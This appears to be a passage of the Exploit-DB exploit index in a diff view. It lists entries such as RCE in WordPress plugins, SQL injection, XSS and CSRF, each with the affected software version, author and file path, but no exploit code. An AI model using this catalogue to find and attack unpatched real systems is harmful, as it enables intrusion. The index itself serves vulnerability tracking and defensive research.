50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
|
||||||
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
|
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
|
||||||
|
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,
|
||||||
|
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",2021-07-02,"Tyler Butler",webapps,hardware,
|
||||||
|
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",2021-07-02,"Alperen Ergel",webapps,php,
|
||||||
|
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
|
||||||
|
50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
|
||||||
|
50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue